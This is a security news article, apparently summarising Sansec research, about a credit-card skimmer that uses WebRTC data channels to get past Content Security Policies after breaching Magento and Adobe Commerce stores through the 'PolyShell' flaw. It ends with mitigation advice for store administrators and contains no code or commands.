Researchers have identified a sophisticated payment skimmer that utilizes WebRTC data channels to deliver malicious payloads and exfiltrate sensitive information. By leveraging this peer-to-peer protocol, the malware successfully evades traditional security measures like Content Security Policies that are designed to block unauthorized HTTP traffic.
A recent wave of cyberattacks has targeted e-commerce platforms using a novel technique to steal credit card information. Unlike traditional skimmers that rely on standard web requests, this malware establishes a direct connection through WebRTC data channels. This allows the attackers to inject malicious code and smuggle out stolen data over encrypted channels that bypass the security rules most websites use to prevent data leaks. Because the traffic uses a specific protocol that operates differently than typical web browsing, it often remains invisible to standard network monitoring tools.
The initial breach is often made possible by a critical vulnerability known as PolyShell, which affects Magento and Adobe Commerce systems. This flaw allows attackers to bypass authentication and upload harmful files directly to a website's server through an application interface. Security experts have observed a massive increase in scanning activity related to this vulnerability, with over half of susceptible online stores already showing signs of attempted or successful exploitation. This highlights a rapid transition from the discovery of the flaw to active, widespread use by multiple hacking groups.
Once the attackers gain access, they deploy a script that automatically connects to a specific remote server. This connection serves as a private tunnel through which the skimmer receives its instructions and sends back the payment details entered by unsuspecting customers. By using a specialized port and encryption method, the malware ensures that the stolen information is shielded from inspection. This technical evolution represents a significant challenge for defenders, as even a site with a very strict security policy might still be vulnerable to this specific type of data transmission.
Although a fix for the underlying PolyShell vulnerability has been developed, it has primarily been released in testing versions of the software and has not yet reached all live production environments. This delay leaves many online retailers in a precarious position as they wait for stable updates to be finalized and deployed. In the meantime, the rapid exploitation of the bug suggests that the window of opportunity for attackers is being used to its full extent across a variety of industries, including the automotive sector.
To protect their systems, website administrators are being urged to implement manual restrictions on specific server directories where attackers typically hide their malicious files. It is also recommended that store owners perform deep scans of their environments to look for backdoors or hidden scripts that may have been planted during the initial wave of attacks. Maintaining vigilant oversight of server activity and restricting file upload permissions are currently the most effective ways to mitigate the risk until official security patches are fully integrated.
Source: https://sansec.io/research/webrtc-skimmer